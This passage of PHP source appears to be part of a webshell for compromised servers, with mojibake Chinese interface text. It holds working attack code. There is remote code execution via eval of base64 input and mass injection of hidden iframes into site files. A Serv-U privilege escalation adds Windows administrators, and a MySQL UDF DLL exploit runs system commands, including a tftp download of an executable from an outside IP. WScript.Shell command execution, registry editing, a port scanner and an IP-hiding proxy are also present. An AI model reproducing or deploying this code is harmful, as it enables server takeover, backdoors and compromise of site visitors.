}\r\n    else{\r\n      $query = "SHOW TABLES FROM " . $_GET[\'db\'];\r\n      $dat = mysql_query($query, $sqlcon) or die(mysql_error());\r\n      while ($row = mysql_fetch_row($dat)){\r\n        html_n("<tr><td><a href=\'?eanver=issql&db=".$_GET[\'db\']."&table=".$row[0]."\'>".$row[0]."</a></td></tr>");\r\n      }\r\n    }\r\n  }\r\n\tbreak;\r\n\t\r\n\tcase "upfiles":\r\n\thtml_n(\'<tr><td>����������ϴ������ļ���С: \'.@get_cfg_var(\'upload_max_filesize\').\'<form method="POST" enctype="multipart/form-data">\');\r\n\thtml_input("text","uppath",root_dir,"<br>�ϴ���·��: ","51");\r\nprint<<<END\r\n<SCRIPT language="JavaScript">\r\nfunction addTank(){\r\nvar k=0;\r\n  k=k+1;\r\n  k=tank.rows.length;\r\n  newRow=document.all.tank.insertRow(-1)\r\n  <!--ɾ��ѡ��-->\r\n  newcell=newRow.insertCell()\r\n  newcell.innerHTML="<input name=\'tankNo\' type=\'checkbox\'> <input type=\'file\' name=\'upfile[]\' value=\'\' size=\'50\'>"\r\n}\r\n\r\nfunction delTank() {\r\n  if(tank.rows.length==1) return;\r\n  var checkit = false;\r\n  for (var i=0;i<document.all.tankNo.length;i++) {\r\n    if (document.all.tankNo[i].checked) {\r\n      checkit=true;\r\n      tank.deleteRow(i+1);\r\n      i--;\r\n    }\r\n  }\r\n  if (checkit) {\r\n  } else{\r\n    alert("��ѡ��һ��Ҫɾ���Ķ���");\r\n    return false;\r\n  }\r\n}\r\n</SCRIPT>\r\n<br><br>\r\n<table cellSpacing=0 cellPadding=0 width="100%" border=0>       \r\n          <tr>\r\n            <td width="7%"><input class="button01" type="button"  onclick="addTank()" value=" �� �� " name="button2"/>\r\n            <input name="button3"  type="button" class="button01" onClick="delTank()" value="ɾ��" />\r\n            </td>\r\n          </tr>\r\n</table>\r\n<table  id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" >\r\n<tr><td>��ѡ��Ҫ�ϴ����ļ���</td></tr>\r\n<tr><td><input name=\'tankNo\' type=\'checkbox\'> <input type=\'file\' name=\'upfile[]\' value=\'\' size=\'50\'></td></tr>\r\n</table>\r\nEND;\r\n\thtml_n(\'<br><input type="submit" name="upfiles" value="�ϴ�" style="width:80px;"> <input type="button" value="����" onclick="window.location=\\\'?eanver=main&path=\'.root_dir.\'\\\';" style="width:80px;">\');\r\n\tif($_POST[\'upfiles\']){\r\n\t\tforeach ($_FILES["upfile"]["error"] as $key => $error){\r\n\t\t\tif ($error == UPLOAD_ERR_OK){\r\n\t\t\t\t$tmp_name = $_FILES["upfile"]["tmp_name"][$key];\r\n\t\t\t\t$name = $_FILES["upfile"]["name"][$key];\r\n\t\t\t\t$uploadfile = str_path($_POST[\'uppath\'].\'/\'.$name);\r\n\t\t\t\t$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3];\r\n\t\t\t\techo \'<br><br>\'.$upload;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\thtml_n(\'</form>\');\r\n\tbreak;\r\n\t\r\n\tcase "guama":\r\n\t$patht = isset($_POST[\'path\']) ? $_POST[\'path\'] : root_dir;\r\n\t$typet = isset($_POST[\'type\']) ? $_POST[\'type\'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx";\r\n\t$codet = isset($_POST[\'code\']) ? $_POST[\'code\'] : "<iframe src=\\"http://localhost/eanver.htm\\" width=\\"1\\" height=\\"1\\"></iframe>";\r\n\thtml_n(\'<tr><td>�ļ���������"|"��,Ҳ������ָ���ļ��.<form method="POST"><br>\');\r\n\thtml_input("text","path",$patht,"·����Χ","45");\r\n\thtml_input("checkbox","pass","","ʹ��Ŀ¼��","",true);\r\n\thtml_input("text","type",$typet,"<br><br>�ļ�����","60");\r\n\thtml_text("code","67","5",$codet);\r\n\thtml_n(\'<br><br>\');\r\n\thtml_radio("�������","�������","guama","qingma");\r\n\thtml_input("submit","passreturn","��ʼ");\r\n\thtml_n(\'</td></tr></form>\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'<tr><td>Ŀ���ļ�:<br><br>\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($patht,$codet,$_POST[\'return\'],$bool,$typet);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "tihuan":\r\n\thtml_n(\'<tr><td>�˹��ܿ�����滻�ļ�����,��С��ʹ��.<br><br><form method="POST">\');\r\n\thtml_input("text","path",root_dir,"·����Χ","45");\r\n\thtml_input("checkbox","pass","","ʹ��Ŀ¼��","",true);\r\n\thtml_text("newcode","67","5",$_POST[\'newcode\']);\r\n\thtml_n(\'<br><br>�滻Ϊ\');\r\n\thtml_text("oldcode","67","5",$_POST[\'oldcode\']);\r\n\thtml_input("submit","passreturn","�滻","<br><br>");\r\n\thtml_n(\'</td></tr></form>\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'<tr><td>Ŀ���ļ�:<br><br>\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($_POST[\'path\'],$_POST[\'newcode\'],"tihuan",$bool,$_POST[\'oldcode\']);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "scanfile":\r\n\tcss_js("4");\r\n\thtml_n(\'<tr><td>�˹��ܿɺܷ�������������MYSQL�û�����������ļ�,������Ȩ.<br>��������ļ�̫��ʱ,��Ӱ��ִ���ٶ�,������ʹ��Ŀ¼��.<form method="POST" name="sform"><br>\');\r\n\thtml_input("text","path",root_dir,"·���","45");\r\n\thtml_input("checkbox","pass","","ʹ��Ŀ¼��","",true);\r\n\thtml_input("text","code",$_POST[\'code\'],"<br><br>�ؼ���","40");\r\n\thtml_select(array("--MYSQL�����ļ�--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange=\'return Fulll(options[selectedIndex].value)\'");\r\n\thtml_n(\'<br><br>\');\r\n\thtml_radio("����ļ��","�����������","scanfile","scancode");\r\n\thtml_input("submit","passreturn","���");\r\n\thtml_n(\'</td></tr></form>\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'<tr><td>�ҵ��ļ�:<br><br>\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($_POST[\'path\'],$_POST[\'code\'],$_POST[\'return\'],$bool);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "scanphp":\r\n\thtml_n(\'<tr><td>ԭ���Ǹ�������붨���,��鿴�����жϺ��ٽ���ɾ��.<form method="POST"><br>\');\r\n\thtml_input("text","path",root_dir,"���ҷ�Χ","40");\r\n\thtml_input("checkbox","pass","","ʹ��Ŀ¼��<br><br>�ű�����","",true);\r\n\thtml_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP"));\r\n\thtml_input("submit","passreturn","����","<br><br>");\r\n\thtml_n(\'</td></tr></form>\');\r\n\tif(!empty($_POST[\'path\'])){\r\n\t\thtml_n(\'<tr><td>�ҵ��ļ�:<br><br>\');\r\n\t\tif(isset($_POST[\'pass\'])) $bool = true; else $bool = false;\r\n\t\tdo_passreturn($_POST[\'path\'],$_POST[\'class\'],"scanphp",$bool);\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "port":\r\n\t$Port_ip = isset($_POST[\'ip\']) ? $_POST[\'ip\'] : \'127.0.0.1\';\r\n\t$Port_port = isset($_POST[\'port\']) ? $_POST[\'port\'] : \'21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873\';\r\nprint<<<END\r\n<form method="POST">\r\n<div class="actall">ɨ��IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>\r\n<div class="actall">�˿ں� <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>\r\n<div class="actall"><input type="submit" value="ɨ��" style="width:80px;"></div>\r\n</form>\r\nEND;\r\n\tif((!empty($_POST[\'ip\'])) && (!empty($_POST[\'port\'])))\r\n\t{\r\n\t\techo \'<div class="actall">\';\r\n\t\t$ports = explode(\'|\', $_POST[\'port\']);\r\n\t\tfor($i = 0;$i < count($ports);$i++)\r\n\t\t{\r\n\t\t\t$fp = @fsockopen($_POST[\'ip\'],$ports[$i],$errno,$errstr,2);\r\n\t\t\techo $fp ? \'<font color="#FF0000">���Ŷ˿� ---> \'.$ports[$i].\'</font><br>\' : \'�رն˿� ---> \'.$ports[$i].\'<br>\';\r\n\t\t\tob_flush();\r\n\t\t\tflush();\r\n\t\t}\r\n\t\techo \'</div>\';\r\n\t}\r\n\tbreak;\r\n\t\r\n\r\n\tcase "getcode":\r\nif (isset($_POST[\'url\'])) {$proxycontents = @file_get_contents($_POST[\'url\']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\\"#F5F5F5\\" style=\\"font-size: 12px;\\"><center><br><p><b>��ȡ URL ����ʧ��</b></p></center></body>";exit;}\r\nprint<<<END\r\n<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">\r\n <form method="POST" target="proxyframe">\r\n  <tr class="firstalt">\r\n\t<td align="center"><b>���ߴ���</b></td>\r\n  </tr>\r\n  <tr class="secondalt">\r\n\t<td align="center"  ><br><ul><li>�ñ����ܽ�ʵ�ּ򵥵� HTTP ����,������ʾʹ�����·����ͼƬ�����Ӽ�CSS�ʽ��.</li><li>�ñ����ܿ���ͨ�����������Ŀ��URL,����֧�� SQL Injection ̽���Լ�ijЩ�����ַ�.</li><li>�ñ��������� URL,��Ŀ���������µ�IP��¼�� : {$_SERVER[\'SERVER_NAME\']}</li></ul></td>\r\n  </tr>\r\n  <tr class="firstalt">\r\n\t<td align="center" height=40  >URL: <input name="url" value="about:blank" type="text"  class="input" size="100" >\r\n <input name="" value="��" type="submit"  class="input" size="30" >\r\n</td>\r\n  </tr>\r\n  <tr class="secondalt">\r\n\t<td align="center"  ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td>\r\n  </tr>\r\n</form></table>\r\nEND;\r\n\tbreak;\r\n\t\r\n\tcase "servu":\r\n\t$SUPass = isset($_POST[\'SUPass\']) ? $_POST[\'SUPass\'] : \'#l@$ak#.lk;0@P\';\r\nprint<<<END\r\n<div class="actall"><a href="?eanver=servu">[ִ�����]</a> <a href="?eanver=servu&o=adduser">[����û�]</a></div>\r\n<form method="POST">\r\n\t<div class="actall">ServU�˿� <input name="SUPort" type="text" value="43958" style="width:300px"></div>\r\n\t<div class="actall">ServU�û� <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>\r\n\t<div class="actall">ServU���� <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>\r\nEND;\r\nif($_GET[\'o\'] == \'adduser\')\r\n{\r\nprint<<<END\r\n<div class="actall">�ʺ� <input name="user" type="text" value="envl" style="width:200px">\r\n���� <input name="password" type="text" value="envl" style="width:200px">\r\nĿ¼ <input name="part" type="text" value="C:\\\\\\\\" style="width:200px"></div>\r\nEND;\r\n}\r\nelse\r\n{\r\nprint<<<END\r\n<div class="actall">��Ȩ��� <input name="SUCommand" type="text" value="net user PHPINFO_CC PHPINFO_CC /add & net localgroup administrators PHPINFO_CC /add" style="width:600px"><br>\r\n<input name="user" type="hidden" value="envl">\r\n<input name="password" type="hidden" value="envl">\r\n<input name="part" type="hidden" value="C:\\\\\\\\"></div>\r\nEND;\r\n}\r\necho \'<div class="actall"><input type="submit" value="ִ��" style="width:80px;"></div></form>\';\r\n\tif((!empty($_POST[\'SUPort\'])) && (!empty($_POST[\'SUUser\'])) && (!empty($_POST[\'SUPass\'])))\r\n\t{\r\n\t\techo \'<div class="actall">\';\r\n\t\t$sendbuf = "";\r\n\t\t$recvbuf = "";\r\n\t\t$domain  = "-SETDOMAIN\\r\\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\\r\\n"."-TZOEnable=0\\r\\n"." TZOKey=\\r\\n";\r\n\t\t$adduser = "-SETUSERSETUP\\r\\n"."-IP=0.0.0.0\\r\\n"."-PortNo=21\\r\\n"."-User=".$_POST[\'user\']."\\r\\n"."-Password=".$_POST[\'password\']."\\r\\n"."-HomeDir=c:\\\\\\r\\n"."-LoginMesFile=\\r\\n"."-Disable=0\\r\\n"."-RelPaths=1\\r\\n"."-NeedSecure=0\\r\\n"."-HideHidden=0\\r\\n"."-AlwaysAllowLogin=0\\r\\n"."-ChangePassword=0\\r\\n".\r\n\t\t\t\t\t\t\t "-QuotaEnable=0\\r\\n"."-MaxUsersLoginPerIP=-1\\r\\n"."-SpeedLimitUp=0\\r\\n"."-SpeedLimitDown=0\\r\\n"."-MaxNrUsers=-1\\r\\n"."-IdleTimeOut=600\\r\\n"."-SessionTimeOut=-1\\r\\n"."-Expire=0\\r\\n"."-RatioUp=1\\r\\n"."-RatioDown=1\\r\\n"."-RatiosCredit=0\\r\\n"."-QuotaCurrent=0\\r\\n"."-QuotaMaximum=0\\r\\n".\r\n\t\t\t\t\t\t\t "-Maintenance=None\\r\\n"."-PasswordType=Regular\\r\\n"."-Ratios=None\\r\\n"." Access=".$_POST[\'part\']."\\|RWAMELCDP\\r\\n";\r\n\t\t$deldomain = "-DELETEDOMAIN\\r\\n"."-IP=0.0.0.0\\r\\n"." PortNo=21\\r\\n";\r\n\t\t$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "������ݰ�: $recvbuf <br>";\r\n\t\t$sendbuf = "USER ".$_POST["SUUser"]."\\r\\n";\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "������ݰ�: $sendbuf <br>";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "������ݰ�: $recvbuf <br>";\r\n\t\t$sendbuf = "PASS ".$_POST["SUPass"]."\\r\\n";\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "������ݰ�: $sendbuf <br>";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "������ݰ�: $recvbuf <br>";\r\n\t\t$sendbuf = "SITE MAINTENANCE\\r\\n";\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "������ݰ�: $sendbuf <br>";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "������ݰ�: $recvbuf <br>";\r\n\t\t$sendbuf = $domain;\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "������ݰ�: $sendbuf <br>";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "������ݰ�: $recvbuf <br>";\r\n\t\t$sendbuf = $adduser;\r\n\t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t\techo "������ݰ�: $sendbuf <br>";\r\n\t\t$recvbuf = @fgets($sock, 1024);\r\n\t\techo "������ݰ�: $recvbuf <br>";\r\n\t\tif(!empty($_POST[\'SUCommand\']))\r\n\t\t{\r\n\t \t\t$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "������ݰ�: $recvbuf <br>";\r\n\t \t\t$sendbuf = "USER ".$_POST[\'user\']."\\r\\n";\r\n\t \t\t@fputs($exp, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "������ݰ�: $sendbuf <br>";\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "������ݰ�: $recvbuf <br>";\r\n\t \t\t$sendbuf = "PASS ".$_POST[\'password\']."\\r\\n";\r\n\t \t\t@fputs($exp, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "������ݰ�: $sendbuf <br>";\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "������ݰ�: $recvbuf <br>";\r\n\t \t\t$sendbuf = "site exec ".$_POST["SUCommand"]."\\r\\n";\r\n\t \t\t@fputs($exp, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "������ݰ�: site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";\r\n\t \t\t$recvbuf = @fgets($exp, 1024);\r\n\t \t\techo "������ݰ�: $recvbuf <br>";\r\n\t \t\t$sendbuf = $deldomain;\r\n\t \t\t@fputs($sock, $sendbuf, strlen($sendbuf));\r\n\t \t\techo "������ݰ�: $sendbuf <br>";\r\n\t \t\t$recvbuf = @fgets($sock, 1024);\r\n\t \t\techo "������ݰ�: $recvbuf <br>";\r\n\t \t\t@fclose($exp);\r\n\t\t}\r\n\t\t@fclose($sock);\r\n\t\techo \'</div>\';\r\n\t}\r\n\tbreak;\r\n\t\r\n\tcase "phpcode":\r\n\t$phpcode = isset($_POST[\'phpcode\']) ? $_POST[\'phpcode\'] : "phpinfo();";\r\n    if($phpcode!=\'phpinfo();\')$phpcode = htmlspecialchars(base64_decode($phpcode));\r\n\techo \'<script language="javascript">\';\r\nhtml_base();\r\n\techo \'function SubmitUrl(){\r\n\t\t\tdocument.getElementById(\\\'phpcode\\\').value = base64encode(document.getElementById(\\\'phpcode\\\').value);\r\n\t\t\tdocument.getElementById(\\\'sendcode\\\').submit();\r\n\t}</script><tr><td><form method="POST" id="sendcode" >����д&lt;? ?&gt;��ǩ,�˹����Ż�ʹ��BASE64���ܴ��ͣ���ֹ�����뱻������˾�֪����ССϸ�ڣ�ע���ɾͣ�<br><br><textarea COLS="120" ROWS="35" name="phpcode" id="phpcode">\'.$phpcode.\'</textarea><br><br><input type="button" value="ִ��" onclick="SubmitUrl();" style="width:80px;">\';\r\n\tif(!empty($_POST[\'phpcode\'])){\r\n\techo "<br><br>";\r\n    eval(stripslashes(base64_decode($_POST[\'phpcode\'])));\r\n\t}\r\n\thtml_n(\'</form>\');\r\n\tbreak;\r\n\r\n\r\n\tcase "myexp":\r\n\t$MSG_BOX = \'���ȵ���DLL,��ִ�����.MYSQL�û�����ΪrootȨ��,����·�������ܼ���DLL�ļ�.<br>mysql5.1�汾��������mysql��Ŀ¼��װUDF�����ʧ��������NTFS-ADS�����ܴ����ļ���\';\r\n\t$info = \'������\';\r\n\t$mhost = \'localhost\'; $muser = \'root\'; $mport = \'3306\'; $mpass = \'\'; $mdata = \'mysql\'; $mpath = \'C:/windows/mysqlDll.dll\'; $sqlcmd = \'ver\';\r\n\tif(isset($_POST[\'mhost\']) && isset($_POST[\'muser\']))\r\n\t{\r\n\t\t$mhost = $_POST[\'mhost\']; $muser = $_POST[\'muser\']; $mpass = $_POST[\'mpass\']; $mdata = $_POST[\'mdata\']; $mport = $_POST[\'mport\']; $mpath = File_Str($_POST[\'mpath\']); $sqlcmd = $_POST[\'sqlcmd\'];\r\n\t\t$conn = mysql_connect($mhost.\':\'.$mport,$muser,$mpass);\r\n\t\tif($conn)\r\n\t\t{\r\n\t\t\t@mysql_select_db($mdata);\r\n\t\t\tif((!empty($_POST[\'outdll\'])) && (!empty($_POST[\'mpath\'])))\r\n\t\t\t{\r\n\t\t\t\t$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";\r\n\t\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t\t{\r\n\t\t\t\t\t$shellcode = Mysql_shellcode();\r\n\t\t\t\t\t$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";\r\n\t\t\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t$query = \'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \\\'\'.$mpath.\'\\\';\';\r\n\t\t\t\t\t\tif(@mysql_query($query,$conn))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t$ap = explode(\'/\', $mpath); $inpath = array_pop($ap);\r\n\t\t\t\t\t\t\t$query = \'Create Function state returns string soname \\\'\'.$inpath.\'\\\';\';\r\n\t\t\t\t\t\t\t$MSG_BOX = @mysql_query($query,$conn) ? \'��װDLL�ɹ�\' : \'��װDLLʧ��\';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse $MSG_BOX = \'����DLL�ļ�ʧ��\';\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse $MSG_BOX = \'д���ʱ��ʧ��\';\r\n\t\t\t\t\t@mysql_query(\'DROP TABLE Envl_Temp_Tab;\',$conn);\r\n\t\t\t\t}\r\n\t\t\t\telse $MSG_BOX = \'������ʱ��ʧ��\';\r\n\t\t\t}\r\n\t\t\tif(!empty($_POST[\'runcmd\']))\r\n\t\t\t{\r\n\t\t\t\t$query = \'select state("\'.$sqlcmd.\'");\';\r\n\t\t\t\t$result = @mysql_query($query,$conn);\r\n\t\t\t\tif($result)\r\n\t\t\t\t{\r\n\t\t\t\t\t$k = 0; $info = NULL;\r\n\t\t\t\t\twhile($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}\r\n\t\t\t\t\t$info = $infotmp;\r\n\t\t\t\t\t$MSG_BOX = \'ִ�гɹ�\';\r\n\t\t\t\t}\r\n\t\t\t\telse $MSG_BOX = \'ִ��ʧ��\';\r\n\t\t\t}\r\n\t\t}\r\n\t\telse $MSG_BOX = \'����MYSQLʧ��\';\r\n\t}\r\nprint<<<END\r\n<script language="javascript">\r\nfunction Fullm(i){\r\n\tStr = new Array(11);\r\n\tStr[0] = "ver";\r\n\tStr[1] = "net user PHPINFO_CC PHPINFO_CC /add";\r\n\tStr[2] = "net localgroup administrators PHPINFO_CC /add";\r\n\tStr[3] = "net start Terminal Services";\r\n\tStr[4] = "tasklist /svc";\r\n\tStr[5] = "netstat -ano";\r\n\tStr[6] = "ipconfig";\r\n\tStr[7] = "net user guest /active:yes";\r\n\tStr[8] = "copy c:\\\\\\\\1.php d:\\\\\\\\2.php";\r\n\tStr[9] = "tftp -i 219.134.46.245 get server.exe c:\\\\\\\\server.exe";\r\n\tStr[10] = "net start telnet";\r\n\tStr[11] = "shutdown -r -t 0";\r\n\tmform.sqlcmd.value = Str[i];\r\n\treturn true;\r\n}\r\n</script>\r\n<form id="mform" method="POST">\r\n<div id="msgbox" class="msgbox">{$MSG_BOX}</div>\r\n<center><div class="actall">\r\n��ַ <input type="text" name="mhost" value="{$mhost}" style="width:110px">\r\n�˿� <input type="text" name="mport" value="{$mport}" style="width:110px">\r\n�û� <input type="text" name="muser" value="{$muser}" style="width:110px">\r\n���� <input type="text" name="mpass" value="{$mpass}" style="width:110px">\r\n��� <input type="text" name="mdata" value="{$mdata}" style="width:110px">\r\n</div><div class="actall">\r\n�ɼ���·�� <input type="text" name="mpath" value="{$mpath}" style="width:555px"> \r\n<input type="submit" name="outdll" value="��װDLL" style="width:80px;"></div>\r\n<div class="actall">��װ�ɹ������ <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:515px;">\r\n<select onchange="return Fullm(options[selectedIndex].value)">\r\n<option value="0" selected>--����--</option>\r\n<option value="1">��ӹ��Ա</option>\r\n<option value="2">��Ϊ�����</option>\r\n<option value="3">����Զ�����</option>\r\n<option value="4">�鿴���̺�PID</option>\r\n<option value="5">�鿴�˿ں�PID</option>\r\n<option value="6">�鿴IP</option>\r\n<option value="7">����guest�ʻ�</option>\r\n<option value="8">�����ļ�</option>\r\n<option value="9">ftp����</option>\r\n<option value="10">����telnet</option>\r\n<option value="11">����</option>\r\n</select>\r\n<input type="submit" name="runcmd" value="ִ��" style="width:80px;">\r\n<textarea style="width:720px;height:300px;">{$info}</textarea>\r\n</div></center>\r\n</form>\r\nEND;\r\n\tbreak; \r\n\tcase "mysql_exec":\r\n  if(isset($_POST[\'mhost\']) && isset($_POST[\'mport\']) && isset($_POST[\'muser\']) && isset($_POST[\'mpass\']))\r\n  {\r\n  \tif(@mysql_connect($_POST[\'mhost\'].\':\'.$_POST[\'mport\'],$_POST[\'muser\'],$_POST[\'mpass\']))\r\n\t  {\r\n\t  \t$cookietime = time() + 24 * 3600;\r\n\t  \tsetcookie(\'m_eanverhost\',$_POST[\'mhost\'],$cookietime);\r\n\t  \tsetcookie(\'m_eanverport\',$_POST[\'mport\'],$cookietime);\r\n\t  \tsetcookie(\'m_eanveruser\',$_POST[\'muser\'],$cookietime);\r\n\t  \tsetcookie(\'m_eanverpass\',$_POST[\'mpass\'],$cookietime);\r\n\t  \tdie(\'��ڵ�½,���Ժ�...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">\');\r\n\t  }\r\n  }\r\nprint<<<END\r\n<form method="POST" name="oform" id="oform">\r\n<div class="actall">��ַ <input type="text" name="mhost" value="localhost" style="width:300px"></div>\r\n<div class="actall">�˿� <input type="text" name="mport" value="3306" style="width:300px"></div>\r\n<div class="actall">�û� <input type="text" name="muser" value="root" style="width:300px"></div>\r\n<div class="actall">���� <input type="text" name="mpass" value="" style="width:300px"></div>\r\n<div class="actall"><input type="submit" value="��½" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location=\'?eanver=mysql_msg\';"></div>\r\n</form>\r\nEND;\r\nbreak; \r\n\tcase "winapi":\r\n \r\n //Windows���ӿ�\r\n//function winshell()\r\n//{\r\n$nop=\'&nbsp;&nbsp;\';\r\nif($_GET[\'winshell\']==\'wscript\'){\r\n$wcmd=$_POST[\'wcmd\'] ? $_POST[\'wcmd\']:\'net user\';\r\n$wcpth=$_POST[\'wcpth\'] ? $_POST[\'wcpth\']:\'cmd.exe\';\r\nprint<<<END\r\n<div class="actall">\r\n<form action="?eanver=winapi&winshell=wscript" method="POST">\r\n<input type="hidden" name="do" id="do" value="do"><br>\r\n{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcpth}" style="width:300px;"> -> CMD·��<br />\r\n{$nop}<input type="text" name="wcmd" id="wcmd" value="{$wcmd}" style="width:300px;"> <input type="submit" value="ִ��" style="width:80px;">\r\n<br><br><br></form></div>\r\nEND;\r\nif($_POST[\'do\']==\'do\'){\r\n$ww=$wcpth." /c ".$wcmd;\r\n$phpwsh=new COM("Wscript.Shell") or die("����Shell.Wscript��ʧ��");\r\n$phpexec=$phpwsh->exec($ww);\r\n$execoutput=$wshexec->stdout();\r\n$result=$execoutput->readall();\r\necho $result;\r\n@$phpwsh->Release();\r\n$phpwsh=NULL;\r\n}\r\n}elseif($_GET[\'winshell\']==\'shelluser\'){\r\n$wuser=$_POST[\'wuser\'] ? $_POST[\'wuser\']:\'silic\';\r\n$wpasw=$_POST[\'wpasw\'] ? $_POST[\'wpasw\']:\'1234@silic#\';\r\nprint<<<END\r\n<div class="actall">\r\n<form action="?eanver=winapi&winshell=shelluser" method="POST">\r\n<input type="hidden" name="do" id="do" value="do"><br>\r\nShell.Users����ӹ��Ա<br><br>\r\n{$nop}�½��û����<input type="text" name="wuser" id="wuser" value="{$wuser}" style="width:100px;"><br>\r\n{$nop}���û����룺<input type="text" name="wpasw" id="wpasw" value="{$wpasw}" style="width:100px;"><br><br>\r\n<input type="submit" value="���" style="width:80px;">\r\n<br><br><br></form></div>\r\nEND;\r\nif($_POST[\'do\']=\'do\'){\r\n$shell = new COM("Shell.Users");\r\n$cmd = $shell->create($wuser);\r\n$cmd->changePassword($wpasw,"");\r\n$cmd->setting["AccountType"] = 3;\r\n}\r\n}elseif($_GET[\'winshell\']==\'regedit\'){\r\n\r\n$shell1 = new COM("wscript.shell") or die("require windows host");\r\n$action = isset($_POST[\'action\']) ? $_POST[\'action\'] : \'\';  \r\necho \'<br>\';\r\necho \'<div><h5>��ȡ&д��&ɾ��ע���</h5><br></div>\';\r\necho \'<br>\';\r\nprint<<<END\r\n<TR><form   action=""   method="post">   \r\n<div><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>   \r\nRpath:&nbsp<input type="hidden" name="action" value="read">   \r\n<input type="text" name="rpath" value="{$rpath}" size="70">   \r\n<input class="bt" type="submit" value="��ȡ"></form></TD></TR><br><br></div>   \r\nEND;\r\n   \r\n$rpath = isset($_POST[\'rpath\']) ? $_POST[\'rpath\'] : \'\';   \r\n$rpath = str_replace("\\\\\\\\", "\\\\", $rpath);      \r\nif   ($action=="read"){\r\n$out = $shell1->RegRead($rpath);\r\necho \'<pre>\'.var_dump($out).\'</pre>\';   \r\necho \'<br><br>\';  \r\n}\r\n\r\nprint<<<END\r\n<TR><form   action=""   method="post">   \r\n<div><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>Wpath:      \r\n<input type="text" name="wpath" value="{$wpath}" size="70"><BR><br> \r\nWtype:&nbsp<input type="text" name="wtype" value="{$wtype}" size="20">\r\nWvalue:&nbsp<input type="text" name="wvalue" value="{$wvalue}" size="30">\r\n<input type="hidden" name="action" value="д��">  \r\n<input class="bt" type="submit" value="д��"></form></TD></TR><br><br><br></div>   \r\nEND;\r\n   \r\n$wpath = isset($_POST[\'wpath\']) ? $_POST[\'wpath\'] : \'\';   \r\n$wpath = str_replace("\\\\\\\\", "\\\\", $wpath);      \r\n$wtype = isset($_POST[\'wtype\']) ? $_POST[\'wtype\'] : \'\';\r\n$wvalue = isset($_POST[\'wvalue\']) ? $_POST[\'wvalue\'] : \'\';\r\nif   ($action=="write"){\r\n$shell1->RegWrite($wpath, $wvalue, $wtype);     \r\n}\r\n\r\nprint<<<END\r\n<TR><form   action=""   method="post">   \r\n<div><TD WIDTH=100 VALIGN=TOP ALIGN=CENTER>  \r\nDpath:<input type="hidden" name="action" value="del">   \r\n<input type="text" name="dpath" value="{$dpath}" size="70">   \r\n<input class="bt" type="submit" value="ɾ��"></form></TD></TR><br><br></div>   \r\nEND;\r\n   \r\n$dpath = isset($_POST[\'dpath\']) ? 